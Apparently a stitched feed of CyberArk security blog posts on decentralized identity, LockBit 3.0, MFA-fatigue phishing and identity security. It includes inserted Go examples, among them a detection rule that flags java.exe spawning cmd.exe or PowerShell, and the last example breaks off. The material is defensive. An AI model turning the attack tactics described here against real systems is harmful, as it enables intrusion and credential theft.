Look both ways before crossing the street. People make smarter, safer decisions when they can see the full picture. When it comes to protecting your organization against cyber threats, better visibility can help you eliminate guesswork, optimize internal resources and detect and respond to potential threats faster – before damage is done. For example, real-time insights on workforce and IT user activity in web applications and infrastructure can help minimize credential theft – the No. 1 area of risk today.

And finally… anything is possible. You have so much potential. Your cybersecurity approach should help you unleash – never hold back – that potential and drive your digital business fearlessly forward.
Decentralized Identity on the Blockchain Promises a New Era of Consumer Privacy. But Can It Deliver? https://www.cyberark.com/blog/decentralized-identity-on-the-blockchain-promises-a-new-era-of-consumer-privacy-but-can-it-deliver/ Fri, 26 Aug 2022 13:27:22 +0000 https://www.cyberark.com/?p=133753

What is my identity? I’m not having an existential moment; instead, I’m asking how others recognize me. How do they know for sure that I am who I say I am?

In the physical world, we carry proof of identification to help verify our identities, and most of us have many: a passport, driver’s license, library card and more. We keep these on our person and do our best to safeguard them.

In the digital world, we have usernames and passwords — roughly 85 combinations per person. We use them to access our “identity objects,” stored by identity providers (IdPs) so we don’t have to hold them ourselves, and access everything from personal bank accounts to work emails. For example, if you’ve ever used your Google password to log in to a retail site while shopping online, you’ve used an IdP. As the IdP, Google holds your identity data and shares it with the retail site when you authorize the action.

By using an IdP, you’ve essentially shifted the responsibility of protecting your identity data to a system that is, in fact, protected by a password. Anyone who knows it, steals it or cracks it could assume your identity. Additionally, an IdP could mistakenly leak your data or even block your access to your identity and in turn, block your access to all the sites using this IdP.

A Tide Change Brings New Expectations for Personal Data Privacy

“A convergence of consumer, government, and market forces are now giving users more control over the data they generate. Instead of serving as a resource that can be freely harvested, countries in every region of the world have begun to treat personal data as an asset owned by individuals and held in trust by firms.” – Harvard Business Review

Identity theft happens every 22 seconds. Consumers are fed up and starting to question whether any third-party system should have such broad control over their personal data, and especially, their identity data. They’re also considering what could happen if this data were ever to be modified or even erased in the future. As these questions swirl, decentralized identity (DID) has emerged as an intriguing potential alternative.

The Decentralized Identity Vision

Decentralized identity, aka self-sovereign or distributed identity, is an open framework that’s being developed to help establish unique and secure access connections between parties or systems without the need for a third-party “connection broker.”

DID is designed to mimic a digital wallet of sorts, in which users store their various identities, or claims. Individuals are solely responsible for keeping their claims safe and release only the minimum information required to forge a secure, trusted connection. No passwords exchange hands; instead, biometric authentication such as a fingerprint or facial recognition is used. Meanwhile, the underlying decentralized blockchain technology works to ensure claims are cryptographically authentic and tamper-proof, significantly reducing the risk of fraud.

Here’s what this looks like in action: You request claims or “verifiable credentials” from various entities, such as a transportation department or your local coffee shop, and store them in your digital wallet. Each organization or “claims issuer” creates a unique claim that contains both personal data (to prove who you are) and authentication data (specifying your permissions or levels of access) about you. Different entities require differing levels of attestation to enable trusted data exchange. For instance, your Starbucks claim couldn’t help you board an international flight, but it could unlock rewards and special coupons. To make sure a claim is legitimate, a claims issuer may also assume the role of “claims verifier,” such as when a police officer asks for your license and registration at a traffic stop.
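To make the issuer, holder and verifier roles concrete, here is an added example written for this page; it is not code from the post or from any CyberArk or DID project. It models a claim as a JSON document signed with Ed25519 by the issuer, a wallet that releases only the claim a verifier asks for, and a verifier that keeps a registry of trusted issuer public keys (the role the ledger plays in a real DID system). The `did:example:` identifiers, the `Claim` layout and the attribute names are assumptions made for the example, not any standard’s data model.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
)

// Claim is a minimal verifiable credential: issuer, subject and the attributes
// the issuer vouches for. The layout is an assumption, not the W3C data model.
type Claim struct {
	Issuer     string            `json:"issuer"`
	Subject    string            `json:"subject"`
	Attributes map[string]string `json:"attributes"`
}

// SignedClaim is what the holder keeps in the wallet: the claim plus the
// issuer's signature over its JSON encoding (encoding/json sorts map keys,
// so the same claim always serialises identically).
type SignedClaim struct {
	Claim     Claim  `json:"claim"`
	Signature []byte `json:"signature"`
}

// Issuer owns a signing key; only the public half is ever published.
type Issuer struct {
	Name string
	priv ed25519.PrivateKey
	Pub  ed25519.PublicKey
}

func NewIssuer(name string) (*Issuer, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Issuer{Name: name, priv: priv, Pub: pub}, nil
}

// Issue signs a claim about subject and hands it to the holder.
func (i *Issuer) Issue(subject string, attrs map[string]string) (SignedClaim, error) {
	c := Claim{Issuer: i.Name, Subject: subject, Attributes: attrs}
	msg, err := json.Marshal(c)
	if err != nil {
		return SignedClaim{}, err
	}
	return SignedClaim{Claim: c, Signature: ed25519.Sign(i.priv, msg)}, nil
}

// Wallet is the holder's store. Presenting a claim is a matter of possession;
// no password travels to the verifier.
type Wallet struct {
	Claims []SignedClaim
}

// Present returns the first claim from issuer that attests attr, and nothing else.
func (w *Wallet) Present(issuer, attr string) (SignedClaim, bool) {
	for _, sc := range w.Claims {
		if _, has := sc.Claim.Attributes[attr]; has && sc.Claim.Issuer == issuer {
			return sc, true
		}
	}
	return SignedClaim{}, false
}

// Verifier trusts a registry of issuer public keys. In a DID system the ledger
// supplies that registry; here it is an in-memory map.
type Verifier struct {
	Trusted map[string]ed25519.PublicKey
}

func NewVerifier(issuers ...*Issuer) *Verifier {
	v := &Verifier{Trusted: map[string]ed25519.PublicKey{}}
	for _, i := range issuers {
		v.Trusted[i.Name] = i.Pub
	}
	return v
}

// Verify checks that the issuer is trusted, that the claim is unaltered since
// signing, and that it actually attests the attribute the verifier needs.
func (v *Verifier) Verify(sc SignedClaim, required string) error {
	pub, ok := v.Trusted[sc.Claim.Issuer]
	if !ok {
		return errors.New("untrusted issuer")
	}
	msg, err := json.Marshal(sc.Claim)
	if err != nil {
		return err
	}
	if !ed25519.Verify(pub, msg, sc.Signature) {
		return errors.New("signature invalid: claim forged or tampered with")
	}
	if _, ok := sc.Claim.Attributes[required]; !ok {
		return fmt.Errorf("claim does not attest %q", required)
	}
	return nil
}

func main() {
	dmv, _ := NewIssuer("did:example:transport-dept") // hypothetical identifiers
	cafe, _ := NewIssuer("did:example:coffee-shop")
	rewards, _ := cafe.Issue("did:example:alice", map[string]string{"rewards_tier": "gold"})
	w := &Wallet{Claims: []SignedClaim{rewards}}
	v := NewVerifier(dmv, cafe)
	sc, _ := w.Present("did:example:coffee-shop", "rewards_tier")
	fmt.Println("rewards:", v.Verify(sc, "rewards_tier"))   // <nil>
	fmt.Println("boarding:", v.Verify(sc, "licence_class")) // coffee-shop claim cannot attest this
	sc.Claim.Attributes["rewards_tier"] = "platinum"         // holder edits the claim
	fmt.Println("tampered:", v.Verify(sc, "rewards_tier"))  // signature invalid
}
```

The three failure paths in `main` are the ones the post cares about: a claim from the wrong kind of issuer cannot be stretched to a higher level of attestation, a claim from an issuer the verifier does not trust is rejected outright, and any edit to a stored claim breaks the issuer's signature.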

By giving identity data control back to the people, DID is a compelling visionary concept. However, like all major technology shifts, it presents numerous challenges. The first is getting people on board with such a big change in their daily routines — it’s a mindset transformation that will take time and a Herculean effort. Then there are technological constraints, such as standardization (just think of the long global journey to 5G and the different blockchains currently competing for dominance) and technology maturity. What happens if your digital wallet fails to back up properly? And how does the “right to be forgotten” work if you wish to eliminate your digital footprint? But perhaps the biggest hurdle of all is managing and securing the massive attack surface DID creates.

The Darker Side of DID: 5 Cybersecurity Risks

The decentralized identity attack surface can be categorized into five distinct areas:

  1. The blockchain code itself. In decentralized systems, everything is based on a blockchain. This is what is used to store identity operations, such as creating an identity, revoking keys or restoring an identity. Every blockchain contains nodes used to validate transactions, write to it and read from it. Both the blockchain and its nodes are made up of code. As with all new software code, they are likely to contain bugs, some of which can turn out to be security issues or vulnerabilities. Every DID implementation introduces a different attack surface.
  2. Fallible humans hold the keys to the kingdom. At the end of the day, distributed systems are only as secure as the private keys that run them. And humans — notorious for making mistakes — are the ones storing and using those keys. In this regard, the promise of DID is a double-edged sword.
  3. Post-authorization cookies could be compromised. When you use a standard centralized identity, you typically get a cookie or an access token that will identify your session for the near future. Now let’s say you’ve authenticated to some service using DID. Now what? Your identity could depend on a single cookie and not on the decentralized system. If malware happens to be running on your phone or laptop, it could potentially steal that cookie or access token after the DID authentication flow is finished.
  4. Nodes can be used maliciously. A new security issue unique to distributed systems is the process of forging trust between a client and a node. The average person can’t read or keep track of an entire blockchain — that’s what nodes are meant to do, as well as to provide reliable data for the chain. The problem is, some nodes can be malicious, or an attacker can try to intercept someone’s communication with that node and try to modify the data. While various systems work to resolve this issue, this is an ongoing challenge across all decentralized systems, and identity systems are no exception.
  5. Traditional security challenges don’t disappear. Since no one lives solely in the blockchain world, every distributed system must have some degree of connection to the real world and other systems that are off the chain. These systems — from node API request handlers to bridges between ledgers and “classic” systems (i.e., relational or NoSQL databases, middleware business logic or front-end application code) — are susceptible to all the “regular” cyber threats.

Years of problematic passwords and endemic identity fraud have highlighted the need for stronger, more secure ways for people to authenticate themselves. Decentralized identity offers some exciting possibilities — but it also presents formidable cybersecurity challenges and new attack surfaces.

DID technology itself is still in its infancy stage. It will take many great minds working together to overcome significant security obstacles, but with enough time, iteration and collaboration, I’m optimistic that DID will mature into a highly effective way to prove “I am who I say I am” in the future.

This post is based on the CyberArk Impact 2022 session “Decentralized Identity: The Good, the Bad and the Ugly,” presented by Daniel Schwartzer, Chief Product Technologist, CyberArk, and Shaked Reiner, Principal Security Researcher, CyberArk Labs.

LockBit 3.0 Ransomware Learns from Defenders, Launches Bug Bounty Program, Begs “Hack Me” (https://www.cyberark.com/blog/lockbit-3-0-ransomware-learns-from-defenders-launches-bug-bounty-program-begs-hack-me/, Tue, 23 Aug 2022 13:00:43 +0000)

The evolution of LockBit – one of the largest ransomware as a service (RaaS) operations in history – exemplifies continued attack commoditization and underground innovation. Since LockBit 3.0 (aka LockBit Black) launched in June 2022, the latest version continues to make headlines – recently for exploiting the Log4j vulnerability and abusing a popular anti-virus system to evade detection. As ransomware threats continue to morph, such reports highlight the importance of defense-in-depth security.

What is LockBit Ransomware?

Known as “ABCD” when it first appeared in September 2019, LockBit soon morphed into a RaaS affiliate program, a subscription-based business model that allows criminals of all skill levels to purchase off-the-shelf ransomware from developers who earn a percentage of each ransom payment.

Relaunched in mid-2021 with enhanced features, LockBit 2.0 was touted by its creators as the “fastest encryption software all over the world.” This was eventually put to the test by researchers who found the claim to be true. LockBit 2.0 quickly skyrocketed in popularity, used by threat actors to target both Windows PCs and Linux hosts (ESXi servers) in double-extortion attempts. As ZDNet put it, “LockBit’s operators use any method available to compromise a network, as long as it works.” In February 2022, the FBI warned organizations to bolster ransomware defenses against LockBit 2.0, which followed variations of this attack chain:

Figure: LockBit 2.0 attack chain example. (Sources: CyberArk Labs, FBI, CSO)

All the while, the highly organized LockBit group continued to innovate and uplevel its operations, joining forces with other ransomware gangs, promoting underground hackathons to attract new talent, and even recruiting corporate insiders to help establish initial access into their employers’ networks. Competitor Conti’s reported disbandment appears to have further strengthened LockBit’s market position. CSO reports that LockBit was responsible for 40% of all analyzed ransomware attacks in May 2022. After a product revamp and beta testing period, LockBit 3.0 was released in late June 2022 with a brazen “Make Ransomware Great Again” tagline and new rules of engagement for both affiliate members and victim organizations.

What’s Most Notable About LockBit 3.0 and Recently Observed Activity?

Threat researchers from around the world continue to work to obtain and analyze LockBit 3.0 samples and share findings to help organizations strengthen ransomware defenses. Based on these collaborative efforts, media reports and CyberArk Labs’ analysis to date, here are three notable LockBit 3.0 characteristics:

  • A first-of-its-kind bug bounty program and new leak site. In March 2022, Microsoft researchers published a report on critical bugs in LockBit 2.0 – a potential contributing factor to the 3.0 release and LockBit’s warning to affiliate program candidates that “we are constantly trying to be hacked and harmed in some way,” as reported by VentureBeat. With a bug bounty program, the LockBit gang is working to get a handle on their own malware vulnerabilities so they can address them, and also prevent researchers and responders from reversing the ransomware’s impact.
  • Anti-analysis protections. One of the most interesting changes made was the introduction of a unique passcode for every LockBit 3.0 sample. Without the passcode, the sample won’t run. This means that researchers, competitors or anyone else cannot analyze the malware dynamically without the passcode. Such anti-analysis measures could soon be embraced by other ransomware groups, and it’s a potential ransomware trend worth tracking.
  • Novel living off the land (LotL) techniques that weaponize critical security tools. Threat researchers have reportedly observed LockBit 3.0 actors obtaining initial access via the Log4j vulnerability, employing new tactics to weaponize legitimate security tools that often operate outside of installed security controls, and evading detection by EDR and traditional anti-virus tools.

These recent revelations emphasize the need for threat detection controls and policies that can help identify and block suspicious activities that may be linked to Log4j or other critical vulnerabilities right away. For instance, configuring policies to detect and block instances of java.exe being used as a parent process for cmd.exe or powershell.exe is one way to block potential Log4j and similar exploitation, as it is very unlikely that java.exe would initiate these processes in a legitimate scenario. Additionally, continuous control of all launched and running programs and their associated privileges will add significant friction for attackers if they attempt to launch a ransomware payload, tamper with security and recovery controls, or try to chain vulnerabilities.
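The java.exe-as-parent detection the paragraph recommends, as an added example written for this page (it is not code from the post or from any CyberArk product): a rule over process-creation records in newline-delimited JSON, using Sysmon event ID 1 field names, run against a handful of constructed events. The export format, the inclusion of `pwsh.exe` alongside the two shells the post names, and the sample events themselves are assumptions.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// ProcessEvent is the subset of a process-creation record (for example a
// Sysmon event ID 1 exported as JSON) that the rule needs. The field names
// follow Sysmon's; the JSON export format is an assumption for this example.
type ProcessEvent struct {
	UtcTime     string `json:"UtcTime"`
	Image       string `json:"Image"`
	CommandLine string `json:"CommandLine"`
	ParentImage string `json:"ParentImage"`
	User        string `json:"User"`
}

// Alert is one rule match, carrying what an analyst needs to triage it.
type Alert struct {
	Time, User, Parent, Child, Cmd string
}

// baseName strips either kind of path separator and lower-cases the result,
// so `C:\Program Files\Java\bin\JAVA.EXE` and `java.exe` compare equal.
func baseName(path string) string {
	if i := strings.LastIndexAny(path, `\/`); i >= 0 {
		path = path[i+1:]
	}
	return strings.ToLower(path)
}

// shells are the child images the post singles out; pwsh.exe is added because
// PowerShell 7 installs under that name.
var shells = map[string]bool{"cmd.exe": true, "powershell.exe": true, "pwsh.exe": true}

// JavaSpawnsShell is the rule from the post: java.exe as the parent of a shell.
func JavaSpawnsShell(e ProcessEvent) bool {
	return baseName(e.ParentImage) == "java.exe" && shells[baseName(e.Image)]
}

// Detect runs the rule over newline-delimited JSON. Malformed lines are
// returned as errors rather than dropped, so a broken export gets noticed.
func Detect(ndjson string) ([]Alert, []error) {
	var alerts []Alert
	var errs []error
	for n, line := range strings.Split(ndjson, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		var e ProcessEvent
		if err := json.Unmarshal([]byte(line), &e); err != nil {
			errs = append(errs, fmt.Errorf("line %d: %w", n+1, err))
			continue
		}
		if JavaSpawnsShell(e) {
			alerts = append(alerts, Alert{e.UtcTime, e.User, e.ParentImage, e.Image, e.CommandLine})
		}
	}
	return alerts, errs
}

// SampleEvents are constructed for this example; they are not real telemetry.
// The first and third events should fire, the second (explorer.exe parent) and
// fourth (notepad.exe child) should not, and the last line is deliberately malformed.
const SampleEvents = `
{"UtcTime":"2022-08-23 09:00:01","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c dir","ParentImage":"C:\\Program Files\\Java\\jre\\bin\\java.exe","User":"CORP\\svc-app"}
{"UtcTime":"2022-08-23 09:00:05","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe","ParentImage":"C:\\Windows\\explorer.exe","User":"CORP\\rachel"}
{"UtcTime":"2022-08-23 09:00:09","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe","CommandLine":"PowerShell.exe -Command Get-Process","ParentImage":"C:\\Program Files\\Java\\jre\\bin\\JAVA.EXE","User":"CORP\\svc-app"}
{"UtcTime":"2022-08-23 09:00:12","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe","ParentImage":"C:\\Program Files\\Java\\jre\\bin\\java.exe","User":"CORP\\svc-app"}
this line is not JSON
`

func main() {
	alerts, errs := Detect(SampleEvents)
	for _, a := range alerts {
		fmt.Printf("ALERT %s user=%s parent=%s child=%s cmd=%q\n", a.Time, a.User, a.Parent, a.Child, a.Cmd)
	}
	for _, err := range errs {
		fmt.Println("parse error:", err)
	}
}
```

Matching on the image basename rather than the full path is deliberate: the JVM can live under many install directories and the casing of exported paths varies, and a rule keyed on one exact path would miss both. In a real deployment the same predicate would be expressed in the EDR or endpoint privilege manager's policy language so the child process is blocked rather than only logged, which is the "detect and block" the paragraph asks for.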

Why Anti-Ransomware Protection Requires Defense in Depth

Ransomware actors will continue to evolve their approaches and, as evidenced by LockBit 3.0, every product version is an opportunity to change up the game.

That’s why effective anti-ransomware protection involves locking down the endpoint and working to prevent malware from being successful at every step of the cyber kill chain – but never at the end-user’s expense. Embracing the right set of multi-layered defenses, including privileged endpoint security controls, can help strike a balance between security and productivity – protecting endpoints while automating access elevations for end-users in a transparent manner to dismantle the cyber kill chain, forcing the attacker to look elsewhere.

Here’s what this looks like: Consistent least privilege enforcement (both for initial system access and continued operation on endpoints – workstations and servers alike), layered with foundational endpoint controls such as credential theft blocking, targeted data-centric anti-ransomware policies, application control, MFA, continuous threat detection and response, consistent OS and software patching and network segmentation, will help position organizations to detect and defend against ransomware attacks of all varieties.

Identity Security in Action at Diamond Trust Bank (https://www.cyberark.com/blog/identity-security-in-action-at-diamond-trust-bank/, Fri, 19 Aug 2022 13:00:27 +0000)

For more than 70 years, customers in East Africa have trusted Diamond Trust Bank (DTB) for their banking needs. Listed on the Nairobi Securities Exchange (NSE), the leading regional bank is an affiliate of the Aga Khan Development Network (AKDN) and has more than 130 branches and 24/7 digital branches across Kenya, Tanzania, Uganda and Burundi.

Assistant Senior Manager Aarif Mawani leads Diamond Trust Bank’s dedicated Identity and Access Management (IAM) team, an integral part of DTB’s larger cybersecurity function. As a virtual presenter at our CyberArk Impact 2022 event, Mawani described the organization’s Identity Security journey, along with valuable best practices for others to consider as they chart their course.

Building the Business Case for Identity Security

In 2019, the regulatory compliance landscape was changing quickly. The SWIFT Customer Security Controls Framework (CSCF) had recently gone into effect, requiring all financial institutions using the global messaging network to comply with heightened cybersecurity standards. Mandatory controls focused heavily on securing the member institution’s environment, knowing “who” and “what” has access to critical systems and applications, and detecting and responding to high-risk activity in operator sessions.

A strong emphasis on cyber governance led the Diamond Trust IAM team to examine existing privileged access controls and move to formalize an Identity Security program centered on a strong and consistent privileged access management policy. An enterprise-wide discovery scan of privileged identities, accounts and credentials provided a clear picture of the organization’s identity risk landscape. Harnessing these insights, the team presented a plan to senior leadership, who recognized intelligent privilege controls are the linchpin for securing critical assets and preserving trust.

Laying a Strong Foundation with Privileged Access Management

After a rigorous evaluation, the Diamond Trust Bank IAM team partnered with CyberArk on their journey to secure the expanding number of identities across their environment. Their mission was clear: “To ensure that privileged and non-privileged users, as well as non-user access to information and communications technology (ICT) resources, follow the principle of least privilege through the identity lifecycle,” explained Mawani.

With critical top-down support, the team got to work designing a program – “not a project,” he stressed – spanning people, processes and technology. The heightened SWIFT CSCF requirements helped to create a sense of urgency to prioritize and accelerate the onboarding process.

Pivoting Quickly: “Necessity is the Mother of Invention”

But just as Mawani and team began evaluating security configurations, the COVID-19 pandemic changed everything.

The bank works with numerous third-party vendors to deliver innovative services to its customers. Many vendor representatives worked on-site at DTB offices under the supervision of DTB personnel, until the pandemic forced everyone to work from home. Virtually overnight, the need for remote vendor connections – via VPN and other traditional remote tools – more than doubled. “The ability to monitor these sessions became a must for us,” said Mawani.

The team quickly pivoted to extend privileged access management controls to support off-site vendors. They obtained necessary stakeholder support by demonstrating the ability to provision, manage and secure third-party access to critical resources with full session isolation, monitoring and audit capabilities – all while leveraging biometrics for multi-factor authentication (MFA) instead of VPNs, passwords or agents.

In 2021, the team was also tapped to integrate CyberArk with the bank’s SWIFT-compliant systems, which entailed building AutoIt scripts to enable web-based connections with session isolation and monitoring.

After successfully transforming these IT challenges into opportunities and achieving measurable wins, the Diamond Trust IAM team turned its focus to Identity Security expansion, such as establishing cloud least privilege to reduce cyber risk and enhance visibility, securing secrets used by the organization’s vulnerability management application and other non-human identities, and broadening identity-centric intelligence and threat detection capabilities.

Sharing Identity Security Success Factors and Lessons Learned

Mawani emphasized several key success factors and lessons learned throughout Diamond Trust Bank’s ongoing journey:

  • Focus on the big picture. From session management to password management, your program must stay in sync with the broader cybersecurity strategy.
  • Collaboration is key. A defined communication strategy focused on end-user awareness and education is critical for overcoming objections, an inevitable part of any major change initiative. Sharing real user benefits and experiences will help make good training materials great.
  • Management buy-in isn’t enough. Most action happens on the front lines. You will need aggressive foot soldiers, so cultivate both employee and vendor champions.
  • Stay vigilant about program fatigue. Remember, Identity Security is an ongoing program, not a point-in-time project.
  • Tackle things in phases. Follow a program roadmap and a risk-based approach, drawing from data insights gleaned from discovery scanning exercises. Goal posts may need to shift from time to time, but the focus should always be to put the ball in the net. When you do, celebrate those milestones – they’re important.

Today, the Diamond Trust Bank IAM team is enabling the digital business by providing fast and secure connections for vendors in 14 different countries around the world – and counting. “Today, there is an equal volume of internal and external traffic accessing CyberArk,” says Mawani. “And the journey continues.”

Don’t Fall for MFA Fatigue or Next-Level Phishing Attacks (https://www.cyberark.com/blog/dont-fall-for-mfa-fatigue-or-next-level-phishing-attacks/, Thu, 18 Aug 2022 13:00:31 +0000)

Phishing attacks are pervasive, whether you work at a global telecommunications company or a small local retail shop. Fortunately, employees have come a long way in spotting phishing attempts, especially those of the email variety: Only 2.9% may click on phishing emails, according to the latest Verizon DBIR. Yet attacks on several large technology firms show how sophisticated some multi-pronged phishing schemes have become.

5 Common Factors Observed in Recent Major Phishing Attacks

Like a choose-your-own-adventure book, phishing can be approached from any number of angles, using an ever-expanding list of attack tactics, techniques and procedures (TTPs). What blocks a phishing attempt one day might not stop the next spoof – making layered defenses a must. Understanding where to focus, and when, can help cyber defenders gain an edge. To that end, we’re exploring five factors observed across these high-profile phishing attacks, along with cyber risk reduction tips from our CyberArk Labs and Red Team.

Phishing Attack Commonalities

1. Social engineering to identify individuals working at specific technology organizations.

Cyber risk reduction tip: Recently surveyed security leaders ranked security awareness training as the second most effective defense-in-depth strategy for ransomware protection. Conduct routine training and education sessions to help embed security-conscious behavior into organizational culture – and keep employees informed of evolving social engineering and phishing attack techniques. Consider enhancing these trainings with ethical phishing exercises. And make sure your spam filters are working as they should, to keep suspicious emails, bulk campaigns and unsolicited marketing materials from reaching employee inboxes.

2. Identity compromise via first-factor credential theft to enter the network. For instance, through man-in-the-middle (MitM) attacks that intercept passwords, or by targeting cached passwords stored in users’ browsers.

Cyber risk reduction tip: Awareness campaigns cannot always prevent a user from getting phished. Says Shay Nahari, VP Red Team Services at CyberArk, “In the grand scheme of defense strategies, endpoint privilege management that can protect client-side credentials – and help prevent the theft of cookies that could enable MFA bypassing – is an important layer.” When deploying endpoint security controls, consider prioritizing users who have a record of clicking on phishing attempts. 

3. MFA fatigue attacks utilizing SMS and voice phishing to impersonate trusted sources, solicit the user to approve MFA notifications, “fatigue” the user with numerous MFA pushes, then gain access to the corporate VPN and other target systems once the user responds to the push.

Cyber risk reduction tip: Attackers continue to find new ways to target MFA and circumvent security controls. Selecting phishing-resistant MFA factors, such as FIDO, QR codes or physical tokens, can help thwart these efforts.

“One method to mitigate MFA fatigue is switching your organization’s MFA setting or configuration to require a one-time password (OTP) versus a push notification,” says Nahari. “When faced with repeated authentication messages and touchpoints, users can often become careless and unwittingly create openings for attackers. While OTP requires more involvement from the user, it can mitigate the risk associated with MFA fatigue.”

He continues, “As part of my team’s adversary simulation exercises, we look at different types of detections, including hard indicators of compromise (IOCs). Hard IOCs are fundamental to a specific attack. In the case of MFA fatigue, the attacker already has access to credentials and needs to solicit the user to approve the MFA notification in order to gain access. If an organization is successful in blocking MFA fatigue, the attacker will be forced to choose another attack path. The OTP configuration can make the user less susceptible to this type of attack and significantly reduce risk.”

A more user-friendly approach is to require number matching for successful MFA authentication. With number matching, users responding to MFA push notifications using the authenticator app are presented with a number. They must type that number into the app to complete the approval. During a phishing attack, the end-user has no knowledge of the correct number sequence and therefore cannot approve the request.
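The number-matching flow described above, as an added example written for this page rather than taken from the post or from any vendor product. The service shows a two-digit number on the login screen and requires the authenticator app to send it back, consumes each challenge on its first answer (right or wrong), expires stale challenges, and refuses to deliver more than a fixed number of pushes to one user per window, so the "fatigue" flood is stopped at the server rather than at the user's thumb. The thresholds, the challenge ID format and the user names are assumptions.

```go
package main

import (
	"crypto/rand"
	"errors"
	"fmt"
	"math/big"
	"time"
)

var (
	ErrTooManyPushes    = errors.New("push limit reached: nothing sent, account flagged for review")
	ErrUnknownChallenge = errors.New("unknown, expired or already resolved challenge")
)

// Challenge is one push. Number is shown on the login screen and must be typed
// into the authenticator app, so a bare "Approve" tap cannot complete it.
type Challenge struct {
	ID      string
	User    string
	Number  int
	Created time.Time
}

// MFAService issues number-matching challenges and caps the pushes a user can
// receive per Window, so a prompt flood is refused rather than delivered.
type MFAService struct {
	pending   map[string]*Challenge
	pushes    map[string][]time.Time // delivery times per user
	MaxPushes int
	Window    time.Duration
	Lifetime  time.Duration    // how long a challenge stays answerable
	Now       func() time.Time // injectable clock, for tests
	nextID    int
}

func NewMFAService() *MFAService {
	return &MFAService{
		pending: map[string]*Challenge{}, pushes: map[string][]time.Time{},
		MaxPushes: 3, Window: 5 * time.Minute, Lifetime: 60 * time.Second, Now: time.Now,
	}
}

// twoDigits draws the matching number from a CSPRNG.
func twoDigits() (int, error) {
	v, err := rand.Int(rand.Reader, big.NewInt(100))
	if err != nil {
		return 0, err
	}
	return int(v.Int64()), nil
}

// Push is called after the first factor succeeded. It refuses to send once the
// user has already received MaxPushes within Window.
func (s *MFAService) Push(user string) (*Challenge, error) {
	now := s.Now()
	var recent []time.Time
	for _, t := range s.pushes[user] {
		if now.Sub(t) < s.Window {
			recent = append(recent, t)
		}
	}
	s.pushes[user] = recent
	if len(recent) >= s.MaxPushes {
		return nil, ErrTooManyPushes
	}
	s.pushes[user] = append(recent, now)
	n, err := twoDigits()
	if err != nil {
		return nil, err
	}
	s.nextID++
	c := &Challenge{ID: fmt.Sprintf("chal-%d", s.nextID), User: user, Number: n, Created: now}
	s.pending[c.ID] = c
	return c, nil
}

// Approve is what the authenticator app calls. The challenge is consumed on the
// first attempt, right or wrong, so a wrong guess cannot be retried.
func (s *MFAService) Approve(id string, typed int) (bool, error) {
	c, ok := s.pending[id]
	if !ok {
		return false, ErrUnknownChallenge
	}
	delete(s.pending, id)
	if s.Now().Sub(c.Created) > s.Lifetime {
		return false, ErrUnknownChallenge
	}
	return typed == c.Number, nil
}

func main() {
	s := NewMFAService()
	for i := 1; i <= 4; i++ { // the fourth prompt inside the window is refused
		c, err := s.Push("rachel")
		if err != nil {
			fmt.Println("push", i, "->", err)
			continue
		}
		ok, err := s.Approve(c.ID, (c.Number+1)%100) // a guessed number never matches
		fmt.Printf("push %d number=%02d guess accepted=%v err=%v\n", i, c.Number, ok, err)
	}
}
```

Two design points carry the security value. First, the approval decision is made on the server from a number only the real login screen displays, so a user who reflexively taps through a prompt they did not initiate cannot complete it. Second, the rate limit lives in `Push`, not in the user's patience: once the cap is hit the service stops sending and returns an error that a SOC can alert on, which is the point at which the post's "hard indicator of compromise" becomes visible.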

When protecting against MFA attacks of all sorts, it’s important to mandate MFA anytime a personal profile is changed to keep malicious actions from going unnoticed, and set up proactive reviews of risky events. Additionally, your SOC can leverage user behavior analytics to set contextual triggers that notify if anomalous behaviors are detected, or block user authentication from suspicious IP addresses.

4. Lateral movement to establish persistence, cover up tracks and compromise additional systems and servers. Privilege escalation to reach critical systems, including domain controllers.

Cyber risk reduction tip: Enforce least privilege across all infrastructure, applications and data. It seems like a straightforward concept, yet it can be particularly challenging to do at scale. That’s where intelligent privilege controls come in, helping to seamlessly secure access for all identities and flexibly automate the identity lifecycle with continuous threat detection and prevention, along with behavioral analytics, to protect your most critical assets.

5. Data exfiltration.

Cyber risk reduction tip: In one of the latest phishing attacks, threat actors reportedly attempted to get back into the network after exfiltrating data and being detected and removed. To do so, they targeted employees who may have made single character changes to their passwords after a mandatory credential reset. Fortunately, the attackers were unsuccessful, but strong password practices are always worth reiterating. Better yet, take the burden off users completely by giving them a way to automatically generate unique and strong passwords.  

Phishing has reached new levels of innovation, with recent events showing just how far attackers will go to dupe their unsuspecting – or MFA-weary – victims. Effective anti-phishing protection should involve both technical and human elements of security, assume that rogue clicks are inevitable, and focus on catching threats quickly before they become bigger phish to fry.

Identity Security: Putting It All Together (https://www.cyberark.com/blog/identity-security-putting-it-all-together/, Thu, 11 Aug 2022 13:00:04 +0000)

Here at CyberArk, we’ve been sharing how Identity Security offers a modern approach grounded in Zero Trust and least privilege to protect organizations’ most critical assets. In recent weeks, we’ve emphasized our Identity Security vision; our unified platform approach; and our continued work in shaping and advancing the Identity Security market.

Centered on intelligent privilege controls, Identity Security works to seamlessly secure access for all identities, flexibly automate the identity lifecycle and provide continuous threat detection and prevention. To help our readers envision how this all comes together, we’re sharing a “day in the life” story of Rachel, a developer working on a major app launch. We’ll also sprinkle in some real-world examples of Identity Security in action, as shared by CyberArk customers during our recent Impact 2022 event.

Seamless and Secure Access for All Identities

For Rachel, a protected and productive day starts with seamless, secure access. She’s just dropped her kids off at school, poured a cup of coffee, and is now logging into her laptop from her home office using adaptive multi-factor authentication (MFA). As Rachel “knocks on the door” to request access to the corporate network, that “knock” is compared with her historical user behavior data, which shows that she typically logs in around 8:30 a.m. EDT from an IP address in the Philadelphia area – exactly what she’s doing now. If suspicious activity occurs, such as multiple failed login attempts, she is prompted for additional authentication factors.
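The comparison of Rachel's "knock" against her baseline, as an added example for this page (not code from the post or from CyberArk's product). It scores a login attempt against the user's usual hours, known networks and recent failures, and returns the reasons alongside the decision so an analyst can see why a step-up was required. The profile fields, the weights, the thresholds and the TEST-NET documentation addresses standing in for Philadelphia-area IPs are all assumptions.

```go
package main

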